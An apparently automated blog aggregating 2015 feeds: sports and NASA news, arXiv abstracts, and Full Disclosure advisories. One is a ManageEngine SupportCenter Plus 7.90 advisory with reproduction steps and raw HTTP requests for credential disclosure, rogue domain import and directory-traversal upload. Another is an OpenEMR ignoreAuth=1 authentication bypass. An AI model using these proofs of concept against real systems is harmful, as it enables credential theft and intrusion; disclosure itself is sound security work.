[+] home_lan_1 Proof of Concept (PoC): ======================= The vulnerability can be exploited by remote attackers without privilege application user account and low user interaction (click). For security demonstration or to reproduce follow the provided information and steps below to continue.

Source: Gmail -> IFTTT-> Blogger

[FD] ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities

Document Title: =============== ManageEngine SupportCenter Plus 7.90 - Multiple Vulnerabilities References (Source): ==================== http://ift.tt/1SvmNhw Release Date: ============= 2015-06-19 Vulnerability Laboratory ID (VL-ID): ==================================== 1501 Common Vulnerability Scoring System: ==================================== 6.9 Product & Service Introduction: =============================== SupportCenter Plus is a web-based customer support software that lets organizations effectively manage customer tickets, their account and contact information, the service contracts and in the process providing a superior customer experience. SupportCenter Plus is commonly deployed on internet accessible interfaces to allow customers to access the application. This common deployment scenario often involves a combination of low privilege accounts for customers (typically local authentication) and higher privilege accounts for help desk stuff (typically Active Directory integrated). Note that it is not unusual to allow any internet user to be able to register a low privilege account. This deployment scenario is important to consider when evaluating the risk of the below vulnerabilities. (Copy of the Vendor Homepage: http://ift.tt/1JZDgZK ) Abstract Advisory Information: ============================== An indepndent vulnerability researcher discovered multiple vulnerabilities in the official ManageEngine SupportCenter Plus v7.90 web-application. Vulnerability Disclosure Timeline: ================================== 2015-05-27: Researcher Notification & Coordination (Alain Homewood) 2015-06-19: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Affected Product(s): ==================== Manage Engine Product: SupportCenter Plus - Web Application 7.90 Exploitation Technique: ======================= Remote Severity Level: =============== High Technical Details & Description: ================================ 1.1 Improper authentication disclosing password (Authenticated) Missing user access control mechanisms allow low privilege users to gain unauthorised access to sensitive Active Directory integration functionality normally only accessibly by Administrators. This functionality allows a low privilege user to: 1.) Retrieve the plain text user name and password for the domain account (typically Domain Administrator or similar) used to integrate with Active Directory 2.) Configure arbitrary domains to be used for authentication and import users from these domains (overwriting existing user records) A low privilege user in SupportCenter Plus can gain privileged access to both the application and any integrated domains. Typical attack scenarios could include: 1.) SupportCenter Plus is accessible via the internet. An internet based attacker who can gain access to a low privilege account (registering an account if enabled or stealing an account) can gain access to highly privileged domain credentials. The attacker can then use these credentials to gain remote access to the organisation through other means (e.g. VPNs or physically in a meeting room at the organisation). 2.) SupportCenter Plus is not accessible via the internet. An attacker who has gained a low level of compromise in an organisation (i.e. any user who can access SupportCenter Plus) can use these vulnerabilities to escalate themselves to domain administrator or similar. Pre-requisites and considerations include: - In order to steal existing domain credentials it is necessary for Active Directory integration to have been setup. - In order to import users from an attacker controlled domain it is necessary for the SupportCenter Plus server to have network connectivity to the attacker server (i.e. firewall rules may prevent this) - It is possible to login to SupportCenter Plus using domain authentication even when this option is hidden (typically done so that the domain name isn`t displayed on the internet accessible login) 1.2 Directory traversal on file upload (Authenticated) Low privilege users have the ability to attach files to work order requests (e.g. to attach a screenshot). This functionality is vulnerable to directory traversal and allows low privilege users to upload files to arbitrary directories. Potential impacts of this vulnerability include: 1.) Remote code execution *** 2.) Denial of service 3.) Uploading malicious static content to web accessible directories (e.g. JavaScript, malware etc) *** There are two key limitations to this vulnerability that limit any easily exploitable method for code execution through exploiting the underlying JBoss environment: 1.) A Java compiler is not installed as part of SupportCenter Plus which prevents uploaded JSP files from being executed 2.) The uploaded directory always appends an additional directory (named after the user`s ID) which prevents deployment of a packaged or unpackaged WAR file (or similar) Despite the above limitations I cannot con conclusively determine that code execution is not possible. 1.3 Reflected cross site scripting (Authenticated) Multiple authenticated reflected cross site scripting vulnerabilities exist in SupportCenter Plus. Unsanitised user provided input in the `query` parameter is echoed back to the user during requests to /CustomReportHandler.do. Only administrators (or similar highly privileged) users with access to the custom report functionality are vulnerable to this attack vector. Unsanitised user provided input in the `compAcct` parameter is echoed back to user during requests to /jsp/ResetADPwd.jsp. Unsanitised user provided input in the `redirectTo` parameter is echoed back to user during requests to /jsp/CacheScreenWidth.jsp. All authenticated users are vulnerable to these attack vectors. Proof of Concept (PoC): ======================= 1.1 The vulnerability can be exploited by remote attackers without user interaction. For security demonstration or to reproduce follow the provided information and steps below. Manual steps to reproduce the vulnerability ... 1.) Set up a Active Directory domain 2.) Install SupportCenter Plus 3.) Login as an administrator and add a Windows domain and associated credentials 4.) Logout and login as a low privilege user (by default there is guest/guest account) 5.) Attempt to access the above URLs and observe that you can access the functionality with no restrictions (e.g. browse to http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and view the password in the HTML source code) Plain text domain credentials can be viewed in the HTML source code of the following pages when logged in as low privilege user: http://[VULNERABLE]/EditDomain.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP http://[VULNERABLE]/ImportADUsers.do Additional domains can be added through browsing to http://[VULNERABLE]/ImportADUsers.do?action=editWindowsDomain&windowsDomainID=1&SUBREQUEST=XMLHTTP and then selecting "Add New Domain" which will allow you to enter the domain details resulting in a POST similar to this: POST /EditDomain.do?SUBREQUEST=XMLHTTP HTTP/1.1 Host: [VULNERABLE] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:38.0) Gecko/20100101 Firefox/38.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest Content-Type: application/x-www-form-urlencoded;charset=UTF-8 Referer: http://[VULNERABLE]:9090/AdminHome.do Content-Length: 181 Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; JSESSIONID=C14EA9B74F5D5C7B2F3055EA96F71188; PREV_CONTEXT_PATH=; JSESSIONIDSSO=391CCA5D883203EBE1CD84BEFCB26144 Connection: keep-alive Pragma: no-cache Cache-Control: no-cache name=TESTDOMAIN&isPublicDomain=on&domainController=CONTROLLER&loginName=Administrator&password=Password123&id=1&addButton=&cancel=Cancel&updateButton=Save&cancel=Cancel&description= Domain users can be imported by browsing to http://[VULNERABLE]/ImportADUsers.do selecting the domain and clicking next. You can then select the Operation Units (OUs) you want to import from the domain and click "Start Import" resulting in a POST similar to this: POST /ImportADUsers.do HTTP/1.1 Host: [VULNERABLE] User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[VULNERABLE]:9090/ImportADUsers.do Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=; JSESSIONID=96062390B861F5901A937CE3A71A8F4D; JSESSIONIDSSO=C5CBE9C1CB90CEA338318B903BEDE26A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 193 selectedOUs=2&importUser=Start+Import&selectOUs=Next&serverName=CONTROLLER&domainName=TESTDOMAIN&userName=Administrator&userPassword=password123&isRefresh=true&phone=true&mobile=true&job=true&email=true 1.2 The vulnerability can be exploited by remote attackers without user interaction. For security demonstration or to reproduce follow the provided information and steps below. Files are uploaded via a POST request to /workorder/Attachment.jsp?component=Request It is possible to manipulate the "module" parameters to traverse directories. Decompiled source code of the creation of the file path is shown below: String filePath1 = "Attachments" + filSep + module + filSep + userID1 Note that an additional directory (named after the user's ID) is always appended to file path. In the below example POST a module value of ../../../../../../../../../../../../ is specified and the logged in user has an ID value of 2. The resulting file in this case is uploaded to c:\2\payload.html on a Windows environment. An example POST request is shown below: POST /workorder/Attachment.jsp?component=Request HTTP/1.1 Host: [VULNERABLE]:9090 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:37.0) Gecko/20100101 Firefox/37.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://[VULNERABLE]:9090/workorder/Attachment.jsp?component=Request Cookie: [object HTMLTableRowElement]=show; [object HTMLDivElement]=show; [object HTMLTableCellElement]=show; PREV_CONTEXT_PATH=/custom; JSESSIONID=DCB297647A29281C4E80C76898B4B09A; 3Adminhelpexp=helpexpshow; 3Adminhelpcoll=helpcollhide; domainName=TESTDOMAIN; JSESSIONIDSSO=A1E2CBF658231DF263F84A994E27F536 Connection: keep-alive Content-Type: multipart/form-data; boundary

Source: Gmail -> IFTTT-> Blogger

Blatter says FIFA officials should pass integrity checks

ZURICH (AP) FIFA President Sepp Blatter says its key officials should be required to pass integrity checks.

from FOX Sports Digital http://ift.tt/1RfGVl2
via IFTTT

Samsung Flaw Lets Hacker Easily Take Control of Your Galaxy Mobile Remotely

More than 600 Million users of Samsung Galaxy smartphones, including the newly released Galaxy S6, are potentially vulnerable to a software bug that allows hackers to secretly monitor the phone's camera and microphone, read text messages and install malicious apps. The vulnerability is due to a problem with the Samsung built-in keyboard app that enables easier predictive text. One of


from The Hacker News http://ift.tt/1Gw2xHg
via IFTTT

Angry Marseille fans call for president's resignation

MARSEILLE, France (AP) With their team facing an uncertain future, angry Marseille supporters have expressed their frustration by tagging walls close to the club' training facilities.

from FOX Sports Digital http://ift.tt/1N8UHpc
via IFTTT

Zero-Day Exploits for Stealing OS X and iOS Passwords

I think you'll agree with me when I say: Apple devices are often considered to be more safe and secure than other devices that run on platforms like Windows and Android, but a recent study will make you think twice before making this statement. A group of security researchers have uncovered potentially deadly zero-day vulnerabilities in both iOS and OS X operating systems that could put


from The Hacker News http://ift.tt/1GvMcSV
via IFTTT

The anonymous artist leaving empowering notes for women

There are two things that anonymous feminist artist Ambivalently Yours does really well: hand-written notes of self-expression to disperse in public ...

from Google Alert - anonymous http://ift.tt/1Lj3GGd
via IFTTT

Brazil has history on its side in U20 World Cup final

AUCKLAND, New Zealand (AP) Brazil will carry a significant edge in experience and a remarkable record of defensive impregnability into Saturday's final against Serbia at the Under-20 World Cup.

from FOX Sports Digital http://ift.tt/1Io2laW
via IFTTT

Tropical Storm Bill Over Texas

Tropical Storm Bill made landfall over Texas at approximately 11:45am CST on June 16, 2015. Shortly after midnight, GPM passed over the storm as it slowly worked it's way northward across the already drenched state of Texas. This visualization shows Bill at precisely 12:11:27am CST (6:11:27 GMT) on June 17, 2015. The GPM Core Observatory carries two instruments that show the location and intensity of rain and snow, which defines a crucial part of the storm structure - and how it will behave. The GPM Microwave Imager sees through the tops of clouds to observe how much and where precipitation occurs. The Dual-frequency Precipitation Radar provides the three-dimensional view, showing the structure of the storm spiraling inward toward the center, with heavier rain on the north side of the storm. Shades of blue represent ice in the upper part of clouds. Viewed from the side, the stark color change from blue to green marks the transition from ice to rain. For forecasters, GPM's microwave and radar data are part of the toolbox of satellite data, including other low Earth orbit and geostationary satellites, that they use to monitor tropical cyclones and hurricanes. The addition of GPM data to the current suite of satellite data is timely. Its predecessor precipitation satellite, the Tropical Rainfall Measuring Mission, after 18 years of operation was deorbited June 16 (the same day Tropical Storm Bill made landfall). GPM's new high-resolution microwave imager data and the unique radar data ensure that forecasters and modelers won't have a gap in coverage. GPM is a joint mission between NASA and the Japan Aerospace Exploration Agency. All GPM data products can be found at NASA Goddard's Precipitation Processing Center.

from NASA's Scientific Visualization Studio: Most Recent Items http://ift.tt/1MQX8vY
via IFTTT

M64: The Black Eye Galaxy


This big, bright, beautiful spiral galaxy is Messier 64, often called the Black Eye Galaxy or the Sleeping Beauty Galaxy for its heavy-lidded appearance in telescopic views. M64 is about 17 million light-years distant in the otherwise well-groomed northern constellation Coma Berenices. In fact, the Red Eye Galaxy might also be an appropriate moniker in this colorful composition. The enormous dust clouds obscuring the near-side of M64's central region are laced with the telltale reddish glow of hydrogen associated with star forming regions. But they are not this galaxy's only peculiar feature. Observations show that M64 is actually composed of two concentric, counter-rotating systems. While all the stars in M64 rotate in the same direction as the interstellar gas in the galaxy's central region, gas in the outer regions, extending to about 40,000 light-years, rotates in the opposite direction. The dusty eye and bizarre rotation is likely the result of a billion year old merger of two different galaxies. via NASA http://ift.tt/1LgCIiu

Thursday, June 18, 2015

[FD] Broken, Abandoned, and Forgotten Code, Part 8

After a brief intermission last week, the Broken, Abandoned series is back with part 8. In this part, we switch back to analyzing the Netgear R6200 upnpd, since that's the ultimate focus of this series. The mystery firmware header gets a name. Also the buffer overflow discussed in part 5 is back, this time without authentication. Here's the link to part 8: http://ift.tt/1Rd1n6c For those interested in getting caught up, here's a link to last week's intermission, offering a summary of where we've been and where we're going: http://ift.tt/1BU9YUm If you missed my post to Full Disclosure where I introduced the series, here's that: http://ift.tt/1F6IUWA As always I welcome feedback via email or Twitter. I'm @zcutlip. I hope you enjoy it! Cheers, Zach

Source: Gmail -> IFTTT-> Blogger

[FD] SpiderOak.com - Disclousure of sensitive information

[FD] CVE-2015-4453 - Authentication bypass in OpenEMR

Title: Authentication bypass in OpenEMR CVE Reference: CVE-2015-4453 Product: OpenEMR Vendor: http://ift.tt/X08Njv Tested versions: 4.2.0 and 4.2.0 patch 1 Affected versions: 2.8.3 to 4.2.0 patch 1 Status: Fixed by vendor Reported by: Brian D. Hysell Details: A bug in OpenEMR's implementation of "fake register_globals" in interface/globals.php allows an attacker to bypass authentication by sending ignoreAuth=1 as a GET or POST request parameter. Impact: An attacker can access sensitive information without a password in parts of the application that do not disable the fake register_globals functionality, do not rely on session data initialized during the login process, and are not governed by access control lists. Notably, this includes interface/fax/fax_dispatch_newpid.php and interface/billing/sl_eob_search.php, which contain unpatched SQL injection vulnerabilities (see CVE-2014-5462). Remediation: Apply vendor's latest patch. Timeline: Vendor contacted: May 4, 2015 Vendor replied: May 4 CVE requested: May 6 Patch released: May 9 CVE assigned: June 9 Announced: June 18

Source: Gmail -> IFTTT-> Blogger

Peru defeats 10-man Venezuela 1-0 on Claudio Pizarro goal

VALPARAISO, Chile (AP) Claudio Pizarro scored in the 72nd minute to lift Peru to a 1-0 victory Thursday over 10-man Venezuela in a Copa America Group C match.

from FOX Sports Digital http://ift.tt/1HZUkxk
via IFTTT

I have a new follower on Twitter


Tina Long
Marriage is a three ring circus: engagement ring, wedding ring, and suffering.
Houston

Following: 1233 - Followers: 232

June 18, 2015 at 09:03PM via Twitter http://twitter.com/TinaLlong

Emergence of synchrony in an Adaptive Interaction Model. (arXiv:1506.05573v1 [cs.HC])

In a Human-Computer Interaction context, we aim to elaborate an adaptive and generic interaction model in two different use cases: Embodied Conversational Agents and Creative Musical Agents for musical improvisation. To reach this goal, we'll try to use the concepts of adaptation and synchronization to enhance the interactive abilities of our agents and guide the development of our interaction model, and will try to make synchrony emerge from non-verbal dimensions of interaction.



from cs.AI updates on arXiv.org http://ift.tt/1GvltWs
via IFTTT

A hybrid algorithm for Bayesian network structure learning with application to multi-label learning. (arXiv:1506.05692v1 [stat.ML])

We present a novel hybrid algorithm for Bayesian network structure learning, called H2PC. It first reconstructs the skeleton of a Bayesian network and then performs a Bayesian-scoring greedy hill-climbing search to orient the edges. The algorithm is based on divide-and-conquer constraint-based subroutines to learn the local structure around a target variable. We conduct two series of experimental comparisons of H2PC against Max-Min Hill-Climbing (MMHC), which is currently the most powerful state-of-the-art algorithm for Bayesian network structure learning. First, we use eight well-known Bayesian network benchmarks with various data sizes to assess the quality of the learned structure returned by the algorithms. Our extensive experiments show that H2PC outperforms MMHC in terms of goodness of fit to new data and quality of the network structure with respect to the true dependence structure of the data. Second, we investigate H2PC's ability to solve the multi-label learning problem. We provide theoretical results to characterize and identify graphically the so-called minimal label powersets that appear as irreducible factors in the joint distribution under the faithfulness condition. The multi-label learning problem is then decomposed into a series of multi-class classification problems, where each multi-class variable encodes a label powerset. H2PC is shown to compare favorably to MMHC in terms of global classification accuracy over ten multi-label data sets covering different application domains. Overall, our experiments support the conclusions that local structural learning with H2PC in the form of local neighborhood induction is a theoretically well-motivated and empirically effective learning framework that is well suited to multi-label learning. The source code (in R) of H2PC as well as all data sets used for the empirical tests are publicly available.



from cs.AI updates on arXiv.org http://ift.tt/1GTJLuQ
via IFTTT

FastMMD: Ensemble of Circular Discrepancy for Efficient Two-Sample Test. (arXiv:1405.2664v2 [cs.AI] UPDATED)

The maximum mean discrepancy (MMD) is a recently proposed test statistic for two-sample test. Its quadratic time complexity, however, greatly hampers its availability to large-scale applications. To accelerate the MMD calculation, in this study we propose an efficient method called FastMMD. The core idea of FastMMD is to equivalently transform the MMD with shift-invariant kernels into the amplitude expectation of a linear combination of sinusoid components based on Bochner's theorem and Fourier transform (Rahimi & Recht, 2007). Taking advantage of sampling of Fourier transform, FastMMD decreases the time complexity for MMD calculation from $O(N^2 d)$ to $O(L N d)$, where $N$ and $d$ are the size and dimension of the sample set, respectively. Here $L$ is the number of basis functions for approximating kernels which determines the approximation accuracy. For kernels that are spherically invariant, the computation can be further accelerated to $O(L N \log d)$ by using the Fastfood technique (Le et al., 2013). The uniform convergence of our method has also been theoretically proved in both unbiased and biased estimates. We have further provided a geometric explanation for our method, namely ensemble of circular discrepancy, which facilitates us to understand the insight of MMD, and is hopeful to help arouse more extensive metrics for assessing two-sample test. Experimental results substantiate that FastMMD is with similar accuracy as exact MMD, while with faster computation speed and lower variance than the existing MMD approximation methods.



from cs.AI updates on arXiv.org http://ift.tt/1sn15xi
via IFTTT

Multi-Context Models for Reasoning under Partial Knowledge: Generative Process and Inference Grammar. (arXiv:1412.4271v2 [cs.AI] UPDATED)

Arriving at the complete probabilistic knowledge of a domain, i.e., learning how all variables interact, is indeed a demanding task. In reality, settings often arise for which an individual merely possesses partial knowledge of the domain, and yet, is expected to give adequate answers to a variety of posed queries. That is, although precise answers to some queries, in principle, cannot be achieved, a range of plausible answers is attainable for each query given the available partial knowledge. In this paper, we propose the Multi-Context Model (MCM), a new graphical model to represent the state of partial knowledge as to a domain. MCM is a middle ground between Probabilistic Logic, Bayesian Logic, and Probabilistic Graphical Models. For this model we discuss: (i) the dynamics of constructing a contradiction-free MCM, i.e., to form partial beliefs regarding a domain in a gradual and probabilistically consistent way, and (ii) how to perform inference, i.e., to evaluate a probability of interest involving some variables of the domain.



from cs.AI updates on arXiv.org http://ift.tt/1AfcdS7
via IFTTT

Minimizing Regret in Dynamic Decision Problems. (arXiv:1502.00152v2 [cs.AI] UPDATED)

The menu-dependent nature of regret-minimization creates subtleties when it is applied to dynamic decision problems. Firstly, it is not clear whether \emph{forgone opportunities} should be included in the \emph{menu}, with respect to which regrets are computed, at different points of the decision problem. If forgone opportunities are included, however, we can characterize when a form of dynamic consistency is guaranteed. Secondly, more subtleties arise when sophistication is used to deal with dynamic inconsistency. In the full version of this paper, we examine, axiomatically and by common examples, the implications of different menu definitions for sophisticated, regret-minimizing agents.



from cs.AI updates on arXiv.org http://ift.tt/16aDgo7
via IFTTT

Exact Hybrid Covariance Thresholding for Joint Graphical Lasso. (arXiv:1503.02128v2 [cs.LG] UPDATED)

This paper considers the problem of estimating multiple related Gaussian graphical models from a $p$-dimensional dataset consisting of different classes. Our work is based upon the formulation of this problem as group graphical lasso. This paper proposes a novel hybrid covariance thresholding algorithm that can effectively identify zero entries in the precision matrices and split a large joint graphical lasso problem into small subproblems. Our hybrid covariance thresholding method is superior to existing uniform thresholding methods in that our method can split the precision matrix of each individual class using different partition schemes and thus split group graphical lasso into much smaller subproblems, each of which can be solved very fast. In addition, this paper establishes necessary and sufficient conditions for our hybrid covariance thresholding algorithm. The superior performance of our thresholding method is thoroughly analyzed and illustrated by a few experiments on simulated data and real gene expression data.



from cs.AI updates on arXiv.org http://ift.tt/1C0h9xE
via IFTTT

Learning Scale-Free Networks by Dynamic Node-Specific Degree Prior. (arXiv:1503.02129v3 [cs.LG] UPDATED)

Learning the network structure underlying data is an important problem in machine learning. This paper introduces a novel prior to study the inference of scale-free networks, which are widely used to model social and biological networks. The prior not only favors a desirable global node degree distribution, but also takes into consideration the relative strength of all the possible edges adjacent to the same node and the estimated degree of each individual node.

To fulfill this, ranking is incorporated into the prior, which makes the problem challenging to solve. We employ an ADMM (alternating direction method of multipliers) framework to solve the Gaussian Graphical model regularized by this prior. Our experiments on both synthetic and real data show that our prior not only yields a scale-free network, but also produces many more correctly predicted edges than the others such as the scale-free inducing prior, the hub-inducing prior and the $l_1$ norm.



from cs.AI updates on arXiv.org http://ift.tt/185Zcld
via IFTTT

A New Fundamental Evidence of Non-Classical Structure in the Combination of Natural Concepts. (arXiv:1505.04981v2 [cs.AI] UPDATED)

We recently performed cognitive experiments on conjunctions and negations of two concepts with the aim of investigating the combination problem of concepts. Our experiments confirmed the deviations (conceptual vagueness, underextension, overextension, etc.) from the rules of classical (fuzzy) logic and probability theory observed by several scholars in concept theory, while our data were successfully modeled in a quantum-theoretic framework developed by ourselves. In this paper, we isolate a new, very stable and systematic pattern of violation of classicality that occurs in concept combinations. In addition, the strength and regularity of this non-classical effect leads us to believe that it occurs at a more fundamental level than the deviations observed up to now. It is our opinion that we have identified a deep non-classical mechanism determining not only how concepts are combined but, rather, how they are formed. We show that this effect can be faithfully modeled in a two-sector Fock space structure, and that it can be exactly explained by assuming that human thought is the supersposition of two processes, a 'logical reasoning', guided by 'logic', and a 'conceptual reasoning' guided by 'emergence', and that the latter generally prevails over the former. All these findings provide a new fundamental support to our quantum-theoretic approach to human cognition.



from cs.AI updates on arXiv.org http://ift.tt/1GnPrxb
via IFTTT

Fox's Van Susteren hits media for 'anonymous trash talkers'

She warned that anonymous sources used in news reports to "trash talk" politicians should know that it isn't difficult to discern their identities.

from Google Alert - anonymous http://ift.tt/1HZxW76
via IFTTT

Orioles Video: Manny Machado's 1st-inning HR is all the offense in 2-1 loss to Phillies; Bud Norris 5 H, 2 ER in 6.0 IP (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

Liberia soccer chief announces run for FIFA presidency

LONDON (AP) Liberia's soccer chief launched a bid on Thursday to succeed Sepp Blatter, pledging to eradicate corruption and ensure fans trust FIFA again by being a unifying leader who stops power being concentrated at the top.

from FOX Sports Digital http://ift.tt/1MPNlGq
via IFTTT

Neymar in danger of missing Copa America quarterfinals

SAO PAULO (AP) Neymar could be banned for more than a game because of the red card received after Brazil's 1-0 loss to Colombia in the Copa America.

from FOX Sports Digital http://ift.tt/1FpvTCU
via IFTTT

Liberia FA head Bility announces run for FIFA presidency

LONDON (AP) The president of the Liberia Football Association has announced he is running for the FIFA presidency.

from FOX Sports Digital http://ift.tt/1fkgsXW
via IFTTT

Argentines wanted in FIFA probe turn themselves in

BUENOS AIRES, Argentina (AP) Two Argentine businessmen wanted in the United States in a FIFA bribery case have turned themselves in to authorities.

from FOX Sports Digital http://ift.tt/1BpY1Lg
via IFTTT

Swiss champion Basel hires Urs Fischer as coach

BASEL, Switzerland (AP) Swiss champion Basel has appointed Urs Fischer as coach on a two-year contract.

from FOX Sports Digital http://ift.tt/1ImtY4k
via IFTTT

ISS Daily Summary Report – 6/17/2015

Ocular Health: Kelly and Kornienko performed their Flight Day 90 (FD90) Ocular Health exams.  With Padalka assisting in setup and as the Crew Medical Officer (CMO)/Operator, Kelly and Kornienko underwent vision tests, blood pressure readings, tonometry, and each took a vision questionnaire. The Ocular Health protocol calls for a systematic gathering of physiological data to characterize the risk of microgravity-induced visual impairment/intracranial pressure in ISS crewmembers. Researchers believe that the measurement of visual, vascular and central nervous system changes over the course of this experiment and during the subsequent post-flight recovery will assist in the development of countermeasures, clinical monitoring strategies, and clinical practice guidelines. Japanese Experiment Module Airlock (JEMAL) Operations: Kelly repressed the JEMAL and following a leak check, opened the inner hatch and retracted the Slide Table (ST) into the JEM Pressurized Module (JPM).  He then removed the Free Space Passive Dosimeter for Life-Science Experiments in Space (PADLES) from the Multi-Purpose Experiment Platform (MPEP) and packed them for return. Free-Space PADLES is an investigation that uses a Sealed Free-Space Dosimeter to measure radiation doses outside the International Space Station (ISS). The obtained results are used for verification of the ISS hull wall shielding contribution, and a benchmark study to develop existing simulation codes and space radiation models for present, and future, human space flight activities. Rodent Research-2 (RR2) Microgravity Science Glovebox (MSG) Cleanup:  Kelly completed the first of two cleanup sessions following the completion of RR2.  Deployed hardware used during the RR-2 activities was cleaned and stowed in its nominal location and consumables were disposed of.  The MSG will next be used tomorrow, when Padalka installs the Observation Analysis of Smectic Islands in Space (OASIS) experiment. Today’s Planned Activities All activities were completed unless otherwise noted. IDENTIFIKATSIYA. Copy ИМУ-Ц micro-accelerometer data to laptop Replacement of ГА DC Filter Unit (БФ) Install No.062 VIS Vision Test Ocular Health – Vision Test using tonometer (Setup) Ocular Health – Blood Pressure Operations Ocular Health – Tonometry Test VIS Vision Questionnaire JEMAL – Pressurization Checking Laptop “Operation Mode” Display after Replacement of ГА DC Filter Unit (БФ) Ocular Health – Blood Pressure Operations Ocular Health – Tonometry Test – Crew Medical Officer JEMAL – Leak Check after Pressurization VIS Vision Questionnaire XF305 – Camcorder Setup JEM Airlock Slide Table (ST) Extension to JPM Side Test activation of Vozdukh Atmosphere Purification System Emergency Vacuum Valves [АВК СОА] Verification of ИП-1 Flow Sensor Position MPEP – Dosimeter Removal СОЖ Maintenance DATA TRANSMISSION RADIO LINK (РСПИ) БЗУ Software Upgrade OASIS – Overview HXP – Adapter Removal JEM – Slide Table Retraction Ocular Health – Vision Test using tonometer (Stowage) Preparing for Photography of EV1 (DC1) and EV1 (MRM2) Window Glass MSG – Activation of MSG glove box PROBOY. RSЕ1 Laptop Ops. PROBOY. Penetration Simulator Ops. Rodent Research (RR) – MSG Cleanup PROBOY. Copy and Downlink Data Photography of EV1 (DC1) and EV1 (MRM2) Window Glass. Photo Downlink OBSTANOVKA. Equipment setup. Crew Prep for PAO PAO Hardware Setup OBSTANOVKA. Re-mate Telemetry connectors. OBSTANOVKA. Measuring Feeder 29, 30 БСКЭ5-32 power voltage and current consumption PAO Event Vacuum Cleaning СКПФ1, СКПФ2 Dust Filters and MRM1  ГЖТ Rodent Research (RR) – MSG Cleanup OBSTANOVKA. Re-mate Telemetry connectors. OBSTANOVKA. Closeout Ops. Flight Director / ISS Crew Tagup Completed Task List Items None  Ground Activities All activities were completed unless otherwise noted. Ocular Health (Tonometry) ops Meteron commanding Three-Day Look Ahead: Thursday, 06/18: RR Microgravity Science Glovebox LSAH cleanup, Ocular Health, OASIS setup Friday, 06/19: Ocular Health, CUCU/CCP checkout, SPX-7 OBT RoBOT training Saturday, 06/20: Crew off duty, housekeeping QUICK ISS Status – Environmental Control Group:                               Component Status Elektron On Vozdukh Manual [СКВ] 1 – SM Air Conditioner System (“SKV1”) On [СКВ] 2 – SM Air Conditioner System (“SKV2”) Off Carbon Dioxide Removal Assembly (CDRA) Lab Standby Carbon Dioxide Removal Assembly (CDRA) Node 3 Operate Major Constituent Analyzer (MCA) Lab Shutdown Major Constituent Analyzer (MCA) Node 3 Operate Oxygen Generation Assembly (OGA) Standby Urine Processing Assembly (UPA) Standby Trace Contaminant Control System (TCCS) Lab Off Trace Contaminant Control System (TCCS) Node 3 Full Up  

from ISS On-Orbit Status Report http://ift.tt/1SreymE
via IFTTT

Greece: Olympiakos chairman released on bail

ATHENS, Greece (AP) The chairman of Greek champion Olympiakos has been suspended from sporting activities and released on bail after testifying at an investigation into alleged corruption in Greek football.

from FOX Sports Digital http://ift.tt/1G6QcXu
via IFTTT

Belgium weighs compensation claim for losing World Cup bid

BRUSSELS (AP) Belgium's football federation could seek compensation for the money spent on its unsuccessful bid for the 2018 World Cup if there evidence of criminal wrongdoing in FIFA's choice of Russia as host.

from FOX Sports Digital http://ift.tt/1JWHMs2
via IFTTT

Marseille signs France U21 midifielder Nkoudou

MARSEILLE, France (AP) Marseille has signed France Under-21 midfielder Georges-Kevin Nkoudou from French league rival Nantes

from FOX Sports Digital http://ift.tt/1G6MIo0
via IFTTT

Anonymous Claims Responsibility for Cyber Attack on Canadian Government Websites

An online hacking collective claiming to be a wing of Anonymous took responsibility for shutting down major Canadian government websites on ...

from Google Alert - anonymous http://ift.tt/1L1LSyd
via IFTTT

M45: The Pleiades Star Cluster


Have you ever seen the Pleiades star cluster? Even if you have, you probably have never seen it as dusty as this. Perhaps the most famous star cluster on the sky, the bright stars of the Pleiades can be seen without binoculars from even the depths of a light-polluted city. With a long exposure from a dark location, though, the dust cloud surrounding the Pleiades star cluster becomes very evident. The featured exposure took over 12 hours and covers a sky area several times the size of the full moon. Also known as the Seven Sisters and M45, the Pleiades lies about 400 light years away toward the constellation of the Bull (Taurus). A common legend with a modern twist is that one of the brighter stars faded since the cluster was named, leaving only six stars visible to the unaided eye. The actual number of Pleiades stars visible, however, may be more or less than seven, depending on the darkness of the surrounding sky and the clarity of the observer's eyesight. via NASA http://ift.tt/1G2jTZJ

Wednesday, June 17, 2015

Neymar sent off as Colombia beats Brazil 1-0 in Copa America

SANTIAGO, Chile (AP) Taking advantage of a bad night by Neymar, Colombia defeated Brazil 1-0 in the Copa America on Wednesday, keeping its quarterfinals hopes alive in the South American tournament.

from FOX Sports Digital http://ift.tt/1JVOtKY
via IFTTT

Fulham assistant Miller is new Newcastle coach in A-League

NEWCASTLE, Australia (AP) Fulham assistant Scott Miller will take over as head coach of the Newcastle Jets next season, returning to Australia after nearly a decade in England.

from FOX Sports Digital http://ift.tt/1L19eEm
via IFTTT

Colombia beats Brazil 1-0 in Copa America

SANTIAGO, Chile (AP) Jeison Murillo scored a 36th-minute winner to give Colombia a 1-0 win over Brazil in the Copa America on Wednesday, keeping his team's quarterfinals hopes alive in the South American tournament.

from FOX Sports Digital http://ift.tt/1IPYDtD
via IFTTT

Orioles Highlight: Chris Parmelee homers for 3rd time in 2 games as Baltimore makes it 3 straight wins over Philadelphia (ESPN)

from ESPN http://ift.tt/1eW1vUH
via IFTTT

